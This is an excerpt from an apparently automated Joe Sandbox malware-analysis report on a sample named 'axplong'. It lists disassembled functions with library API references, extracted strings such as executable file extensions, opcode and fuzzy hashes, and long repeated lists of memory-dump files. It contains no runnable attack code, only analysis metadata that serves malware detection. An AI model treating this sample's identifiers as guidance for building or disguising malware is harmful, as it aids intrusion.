                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID: 5uj
                                                                                                                                                                                                                                                    • API String ID: 3213747228-583990172
                                                                                                                                                                                                                                                    • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                                                                                                    • Instruction ID: 523d5eb6abc0f8f4256cd81fe1e47ea8100008bb53d00277e20c4231cec9590a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB127329002459FDB11EF68C8817FEBBE7EF56360F1481AAE4559B342D6359D42CF60
                                                                                                                                                                                                                                                    Function 006A1A56 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 006A1A84
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006A1A93
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006A1B57
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                                    • String ID: pContext$switchState
                                                                                                                                                                                                                                                    • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                                    • Opcode ID: 36abaef4296d39802904d5ec16504211aa19e1c8dc726f98d1b7c48f834d05fd
                                                                                                                                                                                                                                                    • Instruction ID: c90c8a983737840bb41d1b9e1c7f8426d4d629a40d7b47ec40034e9bbc2a23cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36abaef4296d39802904d5ec16504211aa19e1c8dc726f98d1b7c48f834d05fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318635A002149BCF05FF68C485EADB77BEF4B354F214569E9119B391DB71EE018BA0
                                                                                                                                                                                                                                                    Function 006A4D4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 006A4D9D
                                                                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 006A4DB6
                                                                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 006A4DDC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                    • Opcode ID: 97e0e894b6e145c7549282caa4e63d82cc0b846825c8aed4245971251c79ba88
                                                                                                                                                                                                                                                    • Instruction ID: 11f0dc750443bea86f415fcb402d6c3c4503bdf43cc68ac0ee5d99dcb059d0d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e0e894b6e145c7549282caa4e63d82cc0b846825c8aed4245971251c79ba88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D21E7326002159FCF14FF68DD06AAA77ABEFC6720B10422DF91097284DFB1ED008EA5
                                                                                                                                                                                                                                                    Function 006A70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _wcsrchr
                                                                                                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                                    • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                                    • Opcode ID: ad22b2e622905d93dd84daac2256469a0facae74a70c037784aae97610159da1
                                                                                                                                                                                                                                                    • Instruction ID: 320f8129838bff35816d1a6fab9933c0d7ea5bf6a7aad7ec1709049c5c12d995
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad22b2e622905d93dd84daac2256469a0facae74a70c037784aae97610159da1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201D6376087162666187459AC12ABF17DFAB87BB472E002FFD44F73C2EE45DC4289A4
                                                                                                                                                                                                                                                    Function 0068F9A1 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0068FA36
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
